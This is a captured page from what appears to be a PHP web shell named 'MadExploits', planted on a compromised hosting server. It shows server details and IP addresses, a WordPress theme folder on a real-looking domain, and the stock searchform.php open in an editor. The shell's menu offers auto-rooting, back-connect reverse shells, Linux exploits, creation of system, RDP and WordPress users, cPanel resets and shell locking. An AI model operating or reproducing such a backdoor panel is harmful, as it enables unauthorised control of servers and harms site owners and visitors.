Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.16.217.59
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviveplus.online /
wp-content /
themes /
twentytwentyone /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.stylelintignore
89
B
-rw-r--r--
.stylelintrc-css.json
689
B
-rw-r--r--
.stylelintrc.json
425
B
-rw-r--r--
404.php
721
B
-rw-r--r--
archive.php
995
B
-rw-r--r--
comments.php
2.57
KB
-rw-r--r--
footer.php
2.2
KB
-rw-r--r--
functions.php
18.84
KB
-rw-r--r--
header.php
1
KB
-rw-r--r--
image.php
3.37
KB
-rw-r--r--
index.php
1.17
KB
-rw-r--r--
package-lock.json
604.73
KB
-rw-r--r--
package.json
2.46
KB
-rw-r--r--
page.php
590
B
-rw-r--r--
postcss.config.js
319
B
-rw-r--r--
readme.txt
5.6
KB
-rw-r--r--
screenshot.png
276.27
KB
-rw-r--r--
search.php
1.61
KB
-rw-r--r--
searchform.php
1.4
KB
-rw-r--r--
single.php
1.66
KB
-rw-r--r--
style-rtl.css
151.64
KB
-rw-r--r--
style.css
151.94
KB
-rw-r--r--
style.css.map
22.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : searchform.php
<?php /** * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://developer.wordpress.org/reference/functions/wp_unique_id/ * @link https://developer.wordpress.org/reference/functions/get_search_form/ * * @package WordPress * @subpackage Twenty_Twenty_One * @since Twenty Twenty-One 1.0 */ /* * Generate a unique ID for each form and a string containing an aria-label * if one was passed to get_search_form() in the args array. */ $twentytwentyone_unique_id = wp_unique_id( 'search-form-' ); $twentytwentyone_aria_label = ! empty( $args['aria_label'] ) ? 'aria-label="' . esc_attr( $args['aria_label'] ) . '"' : ''; ?> <form role="search" <?php echo $twentytwentyone_aria_label; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Escaped above. ?> method="get" class="search-form" action="<?php echo esc_url( home_url( '/' ) ); ?>"> <label for="<?php echo esc_attr( $twentytwentyone_unique_id ); ?>"><?php _e( 'Search…', 'twentytwentyone' ); // phpcs:ignore: WordPress.Security.EscapeOutput.UnsafePrintingFunction -- core trusts translations ?></label> <input type="search" id="<?php echo esc_attr( $twentytwentyone_unique_id ); ?>" class="search-field" value="<?php echo get_search_query(); ?>" name="s" /> <input type="submit" class="search-submit" value="<?php echo esc_attr_x( 'Search', 'submit button', 'twentytwentyone' ); ?>" /> </form>
Close